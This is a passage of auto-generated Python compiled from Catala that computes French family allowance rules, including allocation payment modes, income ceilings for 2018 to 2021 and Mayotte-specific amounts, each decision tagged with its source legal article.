elif match_arg_549.code == PriseEnCharge_Code.GardeAlterneeAllocataireUnique:
_ = match_arg_549.value
local_var_121 = False
elif match_arg_549.code == PriseEnCharge_Code.EffectiveEtPermanente:
_ = match_arg_549.value
local_var_121 = False
elif match_arg_549.code == PriseEnCharge_Code.ServicesSociauxAllocationVerseeALaFamille:
_ = match_arg_549.value
local_var_121 = False
elif match_arg_549.code == PriseEnCharge_Code.ServicesSociauxAllocationVerseeAuxServicesSociaux:
_ = match_arg_549.value
local_var_121 = True
if log_decision_taken(SourcePosition(filename="./securite_sociale_L.catala_fr",
start_line=253, start_column=5,
end_line=254, end_column=56,
law_headings=["Article L521-2",
"Chapitre 1er : Allocations familiales",
"Titre 2 : Prestations générales d'entretien",
"Livre 5 : Prestations familiales et prestations assimilées",
"Partie législative",
"Code de la sécurité sociale"]), local_var_121):
return PriseEnCompte(PriseEnCompte_Code.Zero,
Unit())
else:
raise EmptyError
except EmptyError:
raise EmptyError
def local_var_111(_: Any):
try:
match_arg_550 = param_110.prise_en_charge
if match_arg_550.code == PriseEnCharge_Code.GardeAlterneePartageAllocations:
_ = match_arg_550.value
local_var_113 = False
elif match_arg_550.code == PriseEnCharge_Code.GardeAlterneeAllocataireUnique:
_ = match_arg_550.value
local_var_113 = False
elif match_arg_550.code == PriseEnCharge_Code.EffectiveEtPermanente:
_ = match_arg_550.value
local_var_113 = False
elif match_arg_550.code == PriseEnCharge_Code.ServicesSociauxAllocationVerseeALaFamille:
_ = match_arg_550.value
local_var_113 = True
elif match_arg_550.code == PriseEnCharge_Code.ServicesSociauxAllocationVerseeAuxServicesSociaux:
_ = match_arg_550.value
local_var_113 = False
if log_decision_taken(SourcePosition(filename="./securite_sociale_L.catala_fr",
start_line=263, start_column=5,
end_line=264, end_column=48,
law_headings=["Article L521-2",
"Chapitre 1er : Allocations familiales",
"Titre 2 : Prestations générales d'entretien",
"Livre 5 : Prestations familiales et prestations assimilées",
"Partie législative",
"Code de la sécurité sociale"]), local_var_113):
return PriseEnCompte(PriseEnCompte_Code.Complete,
Unit())
else:
raise EmptyError
except EmptyError:
raise EmptyError
return handle_default([local_var_111, local_var_119,
local_var_127, local_var_135,
local_var_143], local_var_151,
local_var_153)
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=102,
start_column=11,
end_line=102,
end_column=26,
law_headings=["Prologue"]))
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=102, start_column=11,
end_line=102, end_column=26,
law_headings=["Prologue"]))
prise_en_compte_108 = log_variable_definition(["AllocationsFamiliales",
"prise_en_compte"], local_var_109)
try:
def local_var_156(param_157: Enfant):
try:
def local_var_200(_: Any):
raise EmptyError
def local_var_198(_: Any):
return log_decision_taken(SourcePosition(filename="./prologue.catala_fr",
start_line=103, start_column=11,
end_line=103, end_column=20,
law_headings=["Prologue"]), True)
def local_var_190(_: Any):
try:
match_arg_551 = param_157.prise_en_charge
if match_arg_551.code == PriseEnCharge_Code.GardeAlterneePartageAllocations:
_ = match_arg_551.value
local_var_192 = False
elif match_arg_551.code == PriseEnCharge_Code.GardeAlterneeAllocataireUnique:
_ = match_arg_551.value
local_var_192 = False
elif match_arg_551.code == PriseEnCharge_Code.EffectiveEtPermanente:
_ = match_arg_551.value
local_var_192 = True
elif match_arg_551.code == PriseEnCharge_Code.ServicesSociauxAllocationVerseeALaFamille:
_ = match_arg_551.value
local_var_192 = False
elif match_arg_551.code == PriseEnCharge_Code.ServicesSociauxAllocationVerseeAuxServicesSociaux:
_ = match_arg_551.value
local_var_192 = False
if log_decision_taken(SourcePosition(filename="./securite_sociale_L.catala_fr",
start_line=188, start_column=5,
end_line=188, end_column=60,
law_headings=["Article L521-2",
"Chapitre 1er : Allocations familiales",
"Titre 2 : Prestations générales d'entretien",
"Livre 5 : Prestations familiales et prestations assimilées",
"Partie législative",
"Code de la sécurité sociale"]), local_var_192):
return VersementAllocations(VersementAllocations_Code.Normal,
Unit())
else:
raise EmptyError
except EmptyError:
raise EmptyError
def local_var_182(_: Any):
try:
match_arg_552 = param_157.prise_en_charge
if match_arg_552.code == PriseEnCharge_Code.GardeAlterneePartageAllocations:
_ = match_arg_552.value
local_var_184 = False
elif match_arg_552.code == PriseEnCharge_Code.GardeAlterneeAllocataireUnique:
_ = match_arg_552.value
local_var_184 = True
elif match_arg_552.code == PriseEnCharge_Code.EffectiveEtPermanente:
_ = match_arg_552.value
local_var_184 = False
elif match_arg_552.code == PriseEnCharge_Code.ServicesSociauxAllocationVerseeALaFamille:
_ = match_arg_552.value
local_var_184 = False
elif match_arg_552.code == PriseEnCharge_Code.ServicesSociauxAllocationVerseeAuxServicesSociaux:
_ = match_arg_552.value
local_var_184 = False
if log_decision_taken(SourcePosition(filename="./securite_sociale_L.catala_fr",
start_line=208, start_column=5,
end_line=208, end_column=69,
law_headings=["Article L521-2",
"Chapitre 1er : Allocations familiales",
"Titre 2 : Prestations générales d'entretien",
"Livre 5 : Prestations familiales et prestations assimilées",
"Partie législative",
"Code de la sécurité sociale"]), local_var_184):
return VersementAllocations(VersementAllocations_Code.Normal,
Unit())
else:
raise EmptyError
except EmptyError:
raise EmptyError
def local_var_174(_: Any):
try:
match_arg_553 = param_157.prise_en_charge
if match_arg_553.code == PriseEnCharge_Code.GardeAlterneePartageAllocations:
_ = match_arg_553.value
local_var_176 = True
elif match_arg_553.code == PriseEnCharge_Code.GardeAlterneeAllocataireUnique:
_ = match_arg_553.value
local_var_176 = False
elif match_arg_553.code == PriseEnCharge_Code.EffectiveEtPermanente:
_ = match_arg_553.value
local_var_176 = False
elif match_arg_553.code == PriseEnCharge_Code.ServicesSociauxAllocationVerseeALaFamille:
_ = match_arg_553.value
local_var_176 = False
elif match_arg_553.code == PriseEnCharge_Code.ServicesSociauxAllocationVerseeAuxServicesSociaux:
_ = match_arg_553.value
local_var_176 = False
if log_decision_taken(SourcePosition(filename="./securite_sociale_L.catala_fr",
start_line=218, start_column=5,
end_line=218, end_column=70,
law_headings=["Article L521-2",
"Chapitre 1er : Allocations familiales",
"Titre 2 : Prestations générales d'entretien",
"Livre 5 : Prestations familiales et prestations assimilées",
"Partie législative",
"Code de la sécurité sociale"]), local_var_176):
return VersementAllocations(VersementAllocations_Code.Normal,
Unit())
else:
raise EmptyError
except EmptyError:
raise EmptyError
def local_var_166(_: Any):
try:
match_arg_554 = param_157.prise_en_charge
if match_arg_554.code == PriseEnCharge_Code.GardeAlterneePartageAllocations:
_ = match_arg_554.value
local_var_168 = False
elif match_arg_554.code == PriseEnCharge_Code.GardeAlterneeAllocataireUnique:
_ = match_arg_554.value
local_var_168 = False
elif match_arg_554.code == PriseEnCharge_Code.EffectiveEtPermanente:
_ = match_arg_554.value
local_var_168 = False
elif match_arg_554.code == PriseEnCharge_Code.ServicesSociauxAllocationVerseeALaFamille:
_ = match_arg_554.value
local_var_168 = False
elif match_arg_554.code == PriseEnCharge_Code.ServicesSociauxAllocationVerseeAuxServicesSociaux:
_ = match_arg_554.value
local_var_168 = True
if log_decision_taken(SourcePosition(filename="./securite_sociale_L.catala_fr",
start_line=258, start_column=5,
end_line=259, end_column=56,
law_headings=["Article L521-2",
"Chapitre 1er : Allocations familiales",
"Titre 2 : Prestations générales d'entretien",
"Livre 5 : Prestations familiales et prestations assimilées",
"Partie législative",
"Code de la sécurité sociale"]), local_var_168):
return VersementAllocations(VersementAllocations_Code.AllocationVerseeAuxServicesSociaux,
Unit())
else:
raise EmptyError
except EmptyError:
raise EmptyError
def local_var_158(_: Any):
try:
match_arg_555 = param_157.prise_en_charge
if match_arg_555.code == PriseEnCharge_Code.GardeAlterneePartageAllocations:
_ = match_arg_555.value
local_var_160 = False
elif match_arg_555.code == PriseEnCharge_Code.GardeAlterneeAllocataireUnique:
_ = match_arg_555.value
local_var_160 = False
elif match_arg_555.code == PriseEnCharge_Code.EffectiveEtPermanente:
_ = match_arg_555.value
local_var_160 = False
elif match_arg_555.code == PriseEnCharge_Code.ServicesSociauxAllocationVerseeALaFamille:
_ = match_arg_555.value
local_var_160 = True
elif match_arg_555.code == PriseEnCharge_Code.ServicesSociauxAllocationVerseeAuxServicesSociaux:
_ = match_arg_555.value
local_var_160 = False
if log_decision_taken(SourcePosition(filename="./securite_sociale_L.catala_fr",
start_line=269, start_column=5,
end_line=270, end_column=48,
law_headings=["Article L521-2",
"Chapitre 1er : Allocations familiales",
"Titre 2 : Prestations générales d'entretien",
"Livre 5 : Prestations familiales et prestations assimilées",
"Partie législative",
"Code de la sécurité sociale"]), local_var_160):
return VersementAllocations(VersementAllocations_Code.Normal,
Unit())
else:
raise EmptyError
except EmptyError:
raise EmptyError
return handle_default([local_var_158, local_var_166,
local_var_174, local_var_182,
local_var_190], local_var_198,
local_var_200)
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=103,
start_column=11,
end_line=103,
end_column=20,
law_headings=["Prologue"]))
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=103, start_column=11,
end_line=103, end_column=20,
law_headings=["Prologue"]))
versement_155 = log_variable_definition(["AllocationsFamiliales",
"versement"], local_var_156)
try:
local_var_203 = integer_of_string("3")
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=151, start_column=11,
end_line=151, end_column=32,
law_headings=["Prologue"]))
nombre_enfants_l521_1_202 = log_variable_definition(["AllocationsFamiliales",
"nombre_enfants_l521_1"], local_var_203)
try:
local_var_205 = integer_of_string("3")
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=153, start_column=11,
end_line=153, end_column=41,
law_headings=["Prologue"]))
nombre_enfants_alinea_2_l521_3_204 = log_variable_definition(["AllocationsFamiliales",
"nombre_enfants_alinéa_2_l521_3"], local_var_205)
result_206 = log_end_call(["AllocationsFamiliales", "version_avril_2008",
"AllocationFamilialesAvril2008"],
log_begin_call(["AllocationsFamiliales", "version_avril_2008",
"AllocationFamilialesAvril2008"], allocation_familiales_avril2008,
AllocationFamilialesAvril2008In()))
version_avril_2008_dot_age_minimum_alinea_1_l521_3_207 = result_206.age_minimum_alinea_1_l521_3_out
try:
try:
try:
local_var_210 = date_courante_105
except EmptyError:
raise EmptyError
except EmptyError:
raise EmptyError
local_var_209 = log_variable_definition(["AllocationsFamiliales",
"prestations_familiales.date_courante"], local_var_210)
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=70, start_column=10,
end_line=70, end_column=23,
law_headings=["Prologue"]))
prestations_familiales_dot_date_courante_208 = local_var_209
try:
try:
try:
local_var_213 = ElementPrestationsFamiliales(ElementPrestationsFamiliales_Code.AllocationsFamiliales,
Unit())
except EmptyError:
raise EmptyError
except EmptyError:
raise EmptyError
local_var_212 = log_variable_definition(["AllocationsFamiliales",
"prestations_familiales.prestation_courante"], local_var_213)
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=71, start_column=10,
end_line=71, end_column=29,
law_headings=["Prologue"]))
prestations_familiales_dot_prestation_courante_211 = local_var_212
try:
try:
try:
local_var_216 = residence_104
except EmptyError:
raise EmptyError
except EmptyError:
raise EmptyError
local_var_215 = log_variable_definition(["AllocationsFamiliales",
"prestations_familiales.résidence"], local_var_216)
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=72, start_column=10,
end_line=72, end_column=19,
law_headings=["Prologue"]))
prestations_familiales_dot_residence_214 = local_var_215
result_217 = log_end_call(["AllocationsFamiliales",
"prestations_familiales", "PrestationsFamiliales"],
log_begin_call(["AllocationsFamiliales", "prestations_familiales",
"PrestationsFamiliales"], prestations_familiales,
PrestationsFamilialesIn(date_courante_in=prestations_familiales_dot_date_courante_208,
prestation_courante_in=prestations_familiales_dot_prestation_courante_211,
residence_in=prestations_familiales_dot_residence_214)))
prestations_familiales_dot_droit_ouvert_218 = result_217.droit_ouvert_out
prestations_familiales_dot_conditions_hors_age_219 = result_217.conditions_hors_age_out
prestations_familiales_dot_age_l512_3_2_220 = result_217.age_l512_3_2_out
prestations_familiales_dot_regime_outre_mer_l751_1_221 = result_217.regime_outre_mer_l751_1_out
prestations_familiales_dot_base_mensuelle_222 = result_217.base_mensuelle_out
try:
try:
try:
local_var_225 = enfants_a_charge_106
except EmptyError:
raise EmptyError
except EmptyError:
raise EmptyError
local_var_224 = log_variable_definition(["AllocationsFamiliales",
"enfant_le_plus_âgé.enfants"], local_var_225)
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=84, start_column=10,
end_line=84, end_column=17,
law_headings=["Prologue"]))
enfant_le_plus_age_dot_enfants_223 = local_var_224
result_226 = log_end_call(["AllocationsFamiliales",
"enfant_le_plus_âgé", "EnfantLePlusÂgé"],
log_begin_call(["AllocationsFamiliales", "enfant_le_plus_âgé",
"EnfantLePlusÂgé"], enfant_le_plus_age,
EnfantLePlusAgeIn(enfants_in=enfant_le_plus_age_dot_enfants_223)))
enfant_le_plus_age_dot_le_plus_age_227 = result_226.le_plus_age_out
try:
def local_var_229(param_230: Enfant):
try:
try:
try:
try:
if log_decision_taken(SourcePosition(filename="./securite_sociale_R.catala_fr",
start_line=83, start_column=19,
end_line=83, end_column=69,
law_headings=["Article R521-1",
"Chapitre 1er : Allocations familiales",
"Titre 2 : Prestations générales d'entretien",
"Livre 5 : Prestations familiales et prestations assimilées",
"Partie réglementaire - Décrets en Conseil d'Etat",
"Code de la sécurité sociale"]), ((param_230.date_de_naissance +
duration_of_numbers(11, 0, 0)) <=
date_of_numbers(2008, 4, 30))):
return version_avril_2008_dot_age_minimum_alinea_1_l521_3_207
else:
raise EmptyError
except EmptyError:
raise EmptyError
except EmptyError:
return integer_of_string("14")
except EmptyError:
raise EmptyError
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=152,
start_column=11,
end_line=152,
end_column=38,
law_headings=["Prologue"]))
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=152, start_column=11,
end_line=152, end_column=38,
law_headings=["Prologue"]))
age_minimum_alinea_1_l521_3_228 = log_variable_definition(["AllocationsFamiliales",
"âge_minimum_alinéa_1_l521_3"], local_var_229)
try:
try:
try:
def local_var_233(enfant_234: Any):
return log_end_call(["PrestationsFamiliales",
"droit_ouvert"],
log_variable_definition(["PrestationsFamiliales",
"droit_ouvert", "output"],
log_begin_call(["PrestationsFamiliales",
"droit_ouvert"],
prestations_familiales_dot_droit_ouvert_218,
log_variable_definition(["PrestationsFamiliales",
"droit_ouvert", "input"], enfant_234))))
local_var_232 = list_filter(local_var_233,
enfants_a_charge_106)
except EmptyError:
raise EmptyError
except EmptyError:
raise EmptyError
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=100, start_column=11,
end_line=100, end_column=61,
law_headings=["Prologue"]))
enfants_a_charge_droit_ouvert_prestation_familiale_231 = log_variable_definition(["AllocationsFamiliales",
"enfants_à_charge_droit_ouvert_prestation_familiale"],
local_var_232)
try:
def local_var_236(param_237: Enfant):
try:
try:
try:
return (enfant_le_plus_age_dot_le_plus_age_227 ==
param_237)
except EmptyError:
raise EmptyError
except EmptyError:
raise EmptyError
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=154,
start_column=11,
end_line=154,
end_column=33,
law_headings=["Prologue"]))
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=154, start_column=11,
end_line=154, end_column=33,
law_headings=["Prologue"]))
est_enfant_le_plus_age_235 = log_variable_definition(["AllocationsFamiliales",
"est_enfant_le_plus_âgé"], local_var_236)
try:
try:
def local_var_250(_: Any):
try:
return (money_of_cents_string("7830000") +
(money_of_cents_string("559500") *
decimal_of_integer(list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231))))
except EmptyError:
raise EmptyError
def local_var_248(_: Any):
return log_decision_taken(SourcePosition(filename="./prologue.catala_fr",
start_line=156, start_column=11,
end_line=156, end_column=28,
law_headings=["Prologue"]), True)
def local_var_246(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
start_line=94, start_column=5,
end_line=94, end_column=69,
law_headings=["Circulaire interministérielle N° DSS/SD2B/2017/352 du 22 décembre 2017 relative à la revalorisation au 1er janvier 2018 des plafonds de ressources d’attribution de certaines prestations familiales servies en métropole, en Guadeloupe, en Guyane, en Martinique, à la Réunion, à Saint-Barthélemy, à Saint-Martin et à Mayotte",
"Montant des plafonds de ressources",
"Décrets divers"]), ((date_courante_105 >=
date_of_numbers(2018, 1, 1)) and (date_courante_105 <=
date_of_numbers(2018, 12, 31)))):
return (money_of_cents_string("7877000") +
(money_of_cents_string("562800") *
decimal_of_integer(list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231))))
else:
raise EmptyError
except EmptyError:
raise EmptyError
def local_var_244(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
start_line=127, start_column=5,
end_line=127, end_column=69,
law_headings=["Instruction interministérielle n° DSS/SD2B/2018/279 du 17 décembre 2018 relative à la revalorisation au 1er janvier 2019 des plafonds de ressources d’attribution de certaines prestations familiales servies en métropole, en Guadeloupe, en Guyane, en Martinique, à la Réunion, à Saint-Barthélemy, à Saint-Martin et à Mayotte",
"Montant des plafonds de ressources",
"Décrets divers"]), ((date_courante_105 >=
date_of_numbers(2019, 1, 1)) and (date_courante_105 <=
date_of_numbers(2019, 12, 31)))):
return (money_of_cents_string("7955800") +
(money_of_cents_string("568400") *
decimal_of_integer(list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231))))
else:
raise EmptyError
except EmptyError:
raise EmptyError
def local_var_242(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
start_line=160, start_column=5,
end_line=160, end_column=69,
law_headings=["Instruction interministerielle no DSS/SD2B/2019/261 du 18 décembre 2019 relative à la revalorisation au 1er janvier 2020 des plafonds de ressources d’attribution de certaines prestations familiales servies en métropole, en Guadeloupe, en Guyane, en Martinique, à La Réunion, à Saint-Barthélemy, à Saint-Martin et à Mayotte",
"Montant des plafonds de ressources",
"Décrets divers"]), ((date_courante_105 >=
date_of_numbers(2020, 1, 1)) and (date_courante_105 <=
date_of_numbers(2020, 12, 31)))):
return (money_of_cents_string("8083100") +
(money_of_cents_string("577500") *
decimal_of_integer(list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231))))
else:
raise EmptyError
except EmptyError:
raise EmptyError
def local_var_240(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
start_line=196, start_column=5,
end_line=196, end_column=69,
law_headings=["Article 1",
"Arrêté du 14 décembre 2020 relatif au montant des plafonds de ressources de certaines prestations familiales et aux tranches du barème applicable au recouvrement des indus et à la saisie des prestations",
"Montant des plafonds de ressources",
"Décrets divers"]), ((date_courante_105 >=
date_of_numbers(2021, 1, 1)) and (date_courante_105 <=
date_of_numbers(2021, 12, 31)))):
return (money_of_cents_string("8155800") +
(money_of_cents_string("582700") *
decimal_of_integer(list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231))))
else:
raise EmptyError
except EmptyError:
raise EmptyError
local_var_239 = handle_default([local_var_240, local_var_242,
local_var_244, local_var_246],
local_var_248, local_var_250)
except EmptyError:
raise EmptyError
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=156, start_column=11,
end_line=156, end_column=28,
law_headings=["Prologue"]))
plafond__i_i_d521_3_238 = log_variable_definition(["AllocationsFamiliales",
"plafond_II_d521_3"], local_var_239)
try:
try:
def local_var_264(_: Any):
try:
return (money_of_cents_string("5595000") +
(money_of_cents_string("559500") *
decimal_of_integer(list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231))))
except EmptyError:
raise EmptyError
def local_var_262(_: Any):
return log_decision_taken(SourcePosition(filename="./prologue.catala_fr",
start_line=155, start_column=11,
end_line=155, end_column=27,
law_headings=["Prologue"]), True)
def local_var_260(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
start_line=87, start_column=5,
end_line=87, end_column=69,
law_headings=["Circulaire interministérielle N° DSS/SD2B/2017/352 du 22 décembre 2017 relative à la revalorisation au 1er janvier 2018 des plafonds de ressources d’attribution de certaines prestations familiales servies en métropole, en Guadeloupe, en Guyane, en Martinique, à la Réunion, à Saint-Barthélemy, à Saint-Martin et à Mayotte",
"Montant des plafonds de ressources",
"Décrets divers"]), ((date_courante_105 >=
date_of_numbers(2018, 1, 1)) and (date_courante_105 <=
date_of_numbers(2018, 12, 31)))):
return (money_of_cents_string("5628600") +
(money_of_cents_string("562800") *
decimal_of_integer(list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231))))
else:
raise EmptyError
except EmptyError:
raise EmptyError
def local_var_258(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
start_line=120, start_column=5,
end_line=120, end_column=69,
law_headings=["Instruction interministérielle n° DSS/SD2B/2018/279 du 17 décembre 2018 relative à la revalorisation au 1er janvier 2019 des plafonds de ressources d’attribution de certaines prestations familiales servies en métropole, en Guadeloupe, en Guyane, en Martinique, à la Réunion, à Saint-Barthélemy, à Saint-Martin et à Mayotte",
"Montant des plafonds de ressources",
"Décrets divers"]), ((date_courante_105 >=
date_of_numbers(2019, 1, 1)) and (date_courante_105 <=
date_of_numbers(2019, 12, 31)))):
return (money_of_cents_string("5684900") +
(money_of_cents_string("568400") *
decimal_of_integer(list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231))))
else:
raise EmptyError
except EmptyError:
raise EmptyError
def local_var_256(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
start_line=153, start_column=5,
end_line=153, end_column=69,
law_headings=["Instruction interministerielle no DSS/SD2B/2019/261 du 18 décembre 2019 relative à la revalorisation au 1er janvier 2020 des plafonds de ressources d’attribution de certaines prestations familiales servies en métropole, en Guadeloupe, en Guyane, en Martinique, à La Réunion, à Saint-Barthélemy, à Saint-Martin et à Mayotte",
"Montant des plafonds de ressources",
"Décrets divers"]), ((date_courante_105 >=
date_of_numbers(2020, 1, 1)) and (date_courante_105 <=
date_of_numbers(2020, 12, 31)))):
return (money_of_cents_string("5775900") +
(money_of_cents_string("577500") *
decimal_of_integer(list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231))))
else:
raise EmptyError
except EmptyError:
raise EmptyError
def local_var_254(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
start_line=180, start_column=5,
end_line=180, end_column=69,
law_headings=["Article 1",
"Arrêté du 14 décembre 2020 relatif au montant des plafonds de ressources de certaines prestations familiales et aux tranches du barème applicable au recouvrement des indus et à la saisie des prestations",
"Montant des plafonds de ressources",
"Décrets divers"]), ((date_courante_105 >=
date_of_numbers(2021, 1, 1)) and (date_courante_105 <=
date_of_numbers(2021, 12, 31)))):
return (money_of_cents_string("5827900") +
(money_of_cents_string("582700") *
decimal_of_integer(list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231))))
else:
raise EmptyError
except EmptyError:
raise EmptyError
local_var_253 = handle_default([local_var_254, local_var_256,
local_var_258, local_var_260],
local_var_262, local_var_264)
except EmptyError:
raise EmptyError
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=155, start_column=11,
end_line=155, end_column=27,
law_headings=["Prologue"]))
plafond__i_d521_3_252 = log_variable_definition(["AllocationsFamiliales",
"plafond_I_d521_3"], local_var_253)
try:
try:
try:
try:
if log_decision_taken(SourcePosition(filename="./securite_sociale_L.catala_fr",
start_line=426, start_column=5,
end_line=427, end_column=71,
law_headings=["Article L755-12",
"Chapitre 5 : Prestations familiales et prestations assimilées",
"Titre 5 : Dispositions particulières à la Guadeloupe, à la Guyane, à la Martinique, à La Réunion, à Saint-Barthélemy et à Saint-Martin",
"Livre 7 : Régimes divers - Dispositions diverses",
"Partie législative",
"Code de la sécurité sociale"]), (prestations_familiales_dot_regime_outre_mer_l751_1_221 and
(list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) ==
integer_of_string("1")))):
local_var_267 = False
else:
raise EmptyError
except EmptyError:
raise EmptyError
except EmptyError:
local_var_267 = True
except EmptyError:
local_var_267 = False
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=139, start_column=11,
end_line=139, end_column=34,
law_headings=["Prologue"]))
droit_ouvert_complement_266 = log_variable_definition(["AllocationsFamiliales",
"droit_ouvert_complément"], local_var_267)
try:
def local_var_269(param_270: Enfant):
try:
try:
try:
try:
if log_decision_taken(SourcePosition(filename="./securite_sociale_L.catala_fr",
start_line=420, start_column=6,
end_line=421, end_column=72,
law_headings=["Article L755-12",
"Chapitre 5 : Prestations familiales et prestations assimilées",
"Titre 5 : Dispositions particulières à la Guadeloupe, à la Guyane, à la Martinique, à La Réunion, à Saint-Barthélemy et à Saint-Martin",
"Livre 7 : Régimes divers - Dispositions diverses",
"Partie législative",
"Code de la sécurité sociale"]), (prestations_familiales_dot_regime_outre_mer_l751_1_221 and
(list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) ==
integer_of_string("1")))):
return False
else:
raise EmptyError
except EmptyError:
raise EmptyError
except EmptyError:
try:
if log_decision_taken(SourcePosition(filename="./securite_sociale_L.catala_fr",
start_line=119, start_column=5,
end_line=125, end_column=59,
law_headings=["Article L521-1",
"Chapitre 1er : Allocations familiales",
"Titre 2 : Prestations générales d'entretien",
"Livre 5 : Prestations familiales et prestations assimilées",
"Partie législative",
"Code de la sécurité sociale"]), ((list_length(enfants_a_charge_106) >=
nombre_enfants_alinea_2_l521_3_204) and
((param_270.age ==
prestations_familiales_dot_age_l512_3_2_220) and
(param_270.a_deja_ouvert_droit_aux_allocations_familiales and
log_end_call(["PrestationsFamiliales",
"conditions_hors_âge"],
log_variable_definition(["PrestationsFamiliales",
"conditions_hors_âge", "output"],
log_begin_call(["PrestationsFamiliales",
"conditions_hors_âge"],
prestations_familiales_dot_conditions_hors_age_219,
log_variable_definition(["PrestationsFamiliales",
"conditions_hors_âge", "input"],
param_270)))))))):
return True
else:
raise EmptyError
except EmptyError:
raise EmptyError
except EmptyError:
return False
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=127,
start_column=11,
end_line=127,
end_column=35,
law_headings=["Prologue"]))
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=127, start_column=11,
end_line=127, end_column=35,
law_headings=["Prologue"]))
droit_ouvert_forfaitaire_268 = log_variable_definition(["AllocationsFamiliales",
"droit_ouvert_forfaitaire"], local_var_269)
try:
try:
try:
if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
integer_of_string("3")):
local_var_272 = ((prestations_familiales_dot_base_mensuelle_222 *
decimal_of_string("0.0463")) *
decimal_of_integer((list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) -
integer_of_string("3"))))
else:
local_var_272 = money_of_cents_string("0")
except EmptyError:
raise EmptyError
except EmptyError:
raise EmptyError
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=124, start_column=11,
end_line=124, end_column=64,
law_headings=["Prologue"]))
montant_initial_base_quatrieme_enfant_et_plus_mayotte_271 = log_variable_definition(["AllocationsFamiliales",
"montant_initial_base_quatrième_enfant_et_plus_mayotte"],
local_var_272)
try:
try:
def local_var_297(_: Any):
try:
if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
integer_of_string("2")):
return (prestations_familiales_dot_base_mensuelle_222 *
decimal_of_string("0.16"))
else:
return money_of_cents_string("0")
except EmptyError:
raise EmptyError
def local_var_295(_: Any):
return log_decision_taken(SourcePosition(filename="./prologue.catala_fr",
start_line=123, start_column=11,
end_line=123, end_column=56,
law_headings=["Prologue"]), True)
def local_var_293(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
start_line=584, start_column=5,
end_line=584, end_column=69, law_headings=["Annexe",
"Décret n°2002-423 du 29 mars 2002 relatif aux prestations familiales à Mayotte",
"Dispositions spéciales relatives à Mayotte",
"Décrets divers"]), ((date_courante_105 >=
date_of_numbers(2011, 1, 1)) and (date_courante_105 <=
date_of_numbers(2011, 12, 31)))):
if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
integer_of_string("2")):
return (prestations_familiales_dot_base_mensuelle_222 *
decimal_of_string("0.0463"))
else:
return money_of_cents_string("0")
else:
raise EmptyError
except EmptyError:
raise EmptyError
def local_var_291(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
start_line=591, start_column=5,
end_line=591, end_column=69, law_headings=["Annexe",
"Décret n°2002-423 du 29 mars 2002 relatif aux prestations familiales à Mayotte",
"Dispositions spéciales relatives à Mayotte",
"Décrets divers"]), ((date_courante_105 >=
date_of_numbers(2012, 1, 1)) and (date_courante_105 <=
date_of_numbers(2012, 12, 31)))):
if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
integer_of_string("2")):
return (prestations_familiales_dot_base_mensuelle_222 *
decimal_of_string("0.0539"))
else:
return money_of_cents_string("0")
else:
raise EmptyError
except EmptyError:
raise EmptyError
def local_var_289(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
start_line=598, start_column=5,
end_line=598, end_column=69, law_headings=["Annexe",
"Décret n°2002-423 du 29 mars 2002 relatif aux prestations familiales à Mayotte",
"Dispositions spéciales relatives à Mayotte",
"Décrets divers"]), ((date_courante_105 >=
